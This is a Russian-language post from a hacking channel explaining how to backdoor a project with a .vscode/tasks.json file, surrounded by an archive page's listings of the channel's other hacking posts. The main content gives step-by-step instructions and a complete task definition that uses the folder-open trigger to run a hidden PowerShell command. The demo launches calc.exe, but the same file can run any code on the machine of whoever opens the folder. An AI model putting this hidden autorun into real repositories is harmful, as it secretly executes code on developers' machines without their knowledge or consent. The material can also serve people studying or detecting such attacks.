🔒 VSCode-Backdoor: внедрение бэкдора через .vscode/tasks.json
VSCode позволяет автоматически выполнять задачи через файл tasks.json. Злоумышленник может воспользоваться этим, чтобы внедрить скрытый бэкдор, запускающий произвольный код при открытии папки в VSCode.
Техника внедрения
1. Создайте директорию .vscode в корне проекта (если она ещё не существует).
2. Добавьте файл tasks.json со следующим содержимым:
{
"version": "2.0.0",
"tasks": [
{
"label": "VS",
"type": "shell",
"command": "powershell",
"args": [
"-WindowStyle", "Hidden",
"-Command",
"Start-Process calc.exe"
],
"problemMatcher": [],
"group": {
"kind": "build",
"isDefault": true
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"echo": false,
"reveal": "never",
"focus": false,
"panel": "dedicated"
}
}
]
}
В этом примере при открытии папки в VSCode скрытно запускается calc.exe.
https://github.com/SaadAhla/VSCode-Backdoor
🔐 @xakkep_1
Другие главы канала «Хакер Free»
Выберите главу, чтобы продолжить чтение
Глава от 15.05.2026
HackBrowserData
Это утилита с открытым исходным кодом на Go, предназначенная д…
Глава от 15.05.2026
С 1 марта 2026 Приказ ФСТЭК РФ №117 обязателен для ГИС и КИИ. Вместе с ФЗ №325 о…
Глава от 14.05.2026
🏰 Прокачиваем скиллы взлома Active Directory с GOAD
Active Directory - это серд…
Глава от 11.05.2026
🛡 DirtyFrag: Элегантная реализация Dirty Pipe
Если вы занимаетесь изучением уяз…
Глава от 08.05.2026
WiFi-password-stealer
Функционал:
- Получение списка сохранённых сетей Wi-Fi.…
Глава от 04.05.2026
Hacker Roadmap — это детальная дорожная карта для тех, кто хочет развиваться в о…
Удалить пост или канал с МАКСОТЕКИ
Заявка подтверждается через бота Макс: нужно быть администратором канала и добавить бота МАКСОТЕКИ в администраторы. После проверки канал или конкретный пост скрывается с сайта.
🔍
Архив всех постов Макс
Поиск по тексту среди 5,376,715 постов
из 199,484 каналов.
Фильтры по дате, видео, репостам и удалённым публикациям.
1 ₽ — 7 дней доступа
далее 490 ₽/мес
Связанные темы в других каналах
Каналы из той же тематики, где часто появляются близкие сюжеты
@canalmaxone
AntiCloudMod
AntiCloudMod — сообщество для тех, кто ценит свободу общения без облачной цензуры. Здесь обсуждают альтернативные мессенджеры, инструменты для приватности и децентрализов…
👥 239 566 · +5 305/7д
@WylsacomRed
Wylsacom Red
Официальный канал Wylsacom в Max. Тут всё про технологии и жизнь в ногу со временем! Номер заявления для регистрации в РКН: № 6979154178 Розыгрыши: kichaev@wylsacom.med…
👥 140 913 · +6 001/7д
@BelgorodDRONE
Информация БПЛА Белгород, Белгородский район
Информация БПЛА Белгород, Белгородский район — специализированный канал в мессенджере Макс, посвященный новостям и информации о беспилотных летательных аппаратах в регион…
👥 124 950 · +4 663/7д
@TikTokModCloud
TikTokModCloud
Официальные обновления стабильного мода TikTok Чат: https://clck.ru/3S6mVh По рекламе: https://iimax.ru/dim4ugan
👥 60 713 · +2 215/7д
@hitech
Hi-Tech
Оперативные новости, обзоры гаджетов, собственное видео, трансляции мировых анонсов и мероприятий По вопросам сотрудничества и размещения рекламы i.ostapenko@corp.mail.r…
👥 53 245 · -137/7д
@dvizhitall
Движитал
Канал для людей, которым интересен технический прогресс на прикладном уровне. Идея полезного знания — суть каждого поста в этом канале. Powered by МТС Регистрация в Р…
👥 36 189 · +12 207/7д
Популярные посты канала «Хакер Free»
jfscan
Супербыстрое сканирование портов и обнаружение сервисов с использованием Masscan и Nmap. Сканируйте крупные сети с помощью Masscan и…
👁 7 829 просмотров
🔥 Portable Kali box + сенсорный экран
#kalilinux #raspberrypi
🔐 @xakkep_1
👁 7 818 просмотров
Bkcrack — это инструмент для взлома ZIP-архивов, зашифрованных с использованием классического шифрования PKZIP.
Он позволяет:
▫️Восстанови…
👁 7 815 просмотров
Tookie — это инструмент для OSINT (разведки с использованием открытых источников), позволяющий получать информацию о людях. Он использует ра…
👁 7 808 просмотров
Ghostport
Высокопроизводительный инструмент для подмены портов, написанный на Rust. Сбивайте с толку порт-сканеры с помощью динамической эм…
👁 7 786 просмотров
🌐 Geospy
Инструмент на Python, использующий геолокационный сервис на базе ИИ от Graylark для определения места, где были сделаны фотографи…
👁 7 765 просмотров
Suricata — это IDS/IPS-движок с уклоном в хардкор.
Зачем нужно: режет трафик на куски, палит подозрительные пакеты, знает, как выглядят нас…
👁 7 712 просмотров
🚀 Подборка полезных IT каналов в Max
Системное администрирование, DevOps 📌
https://max.ru/i_odmin Все для системного администратора
https…
👁 7 706 просмотров
🕵️♂️ DockerSpy — слежка за контейнерами
Инструмент для удалённого шпионажа за Docker-контейнерами через сокет docker.sock. Позволяет:
…
👁 7 698 просмотров
Discover
Пользовательские bash-скрипты для автоматизации различных задач тестирования на проникновение, включая разведку, сканирование, пер…
👁 7 676 просмотров
🚀 Подборка полезных IT каналов в Max
Системное администрирование, DevOps 📌
https://max.ru/i_odmin Все для системного администратора
https…
👁 7 675 просмотров
🚀 Подборка полезных IT каналов в Max
Системное администрирование, DevOps 📌
https://max.ru/i_odmin Все для системного администратора
https…
👁 7 650 просмотров
Web-Check
Получите представление о внутреннем устройстве указанного веб-сайта: выявляйте потенциальные векторы атак, анализируйте архитекту…
👁 7 645 просмотров
BYOB (Build Your Own Botnet) — это проект с открытым исходным кодом, который позволяет исследователям и специалистам по кибербезопасности из…
👁 7 644 просмотров
Об этом заявила иранская хакерская группа «Handala»
🔐 @xakkep_1
👁 7 595 просмотров
ClatScope — лучший и самый универсальный OSINT-инструмент для получения данных о геолокации, DNS, WHOIS, номерах телефонов, email-адресах, у…
👁 7 588 просмотров
Hacker Roadmap — это детальная дорожная карта для тех, кто хочет развиваться в области кибербезопасности.
Репозиторий содержит подборку ресу…
👁 7 524 просмотров
OpenCTI — это мощная платформа для управления угрозами и киберразведкой. Она позволяет собирать, анализировать и делиться информацией о кибе…
👁 7 493 просмотров
WiFi-password-stealer
Функционал:
- Получение списка сохранённых сетей Wi-Fi.
- Извлечение паролей из системного хранилища.
- Вывод резул…
👁 7 433 просмотров
🏰 Прокачиваем скиллы взлома Active Directory с GOAD
Active Directory - это сердце большинства корпоративных сетей. Умение находить в нем уя…
👁 7 170 просмотров
🏷 Темы и теги
📋 О канале Хакер Free
Погрузись в мир кибербезопасности и взлома вместе с Хакер Free. Здесь ты найдешь актуальные техники защиты информации, гайды по кодингу и новости из мира хакеров. Для новичков и профи — контент, который держит в тонусе.
Заявка в МАКСОТЕКА
➕
Добавьте свой канал в каталог
Зарегистрируйтесь в личном кабинете и добавьте канал за пару кликов.
Перейти в личный кабинет →
Бесплатная регистрация, быстрая модерация.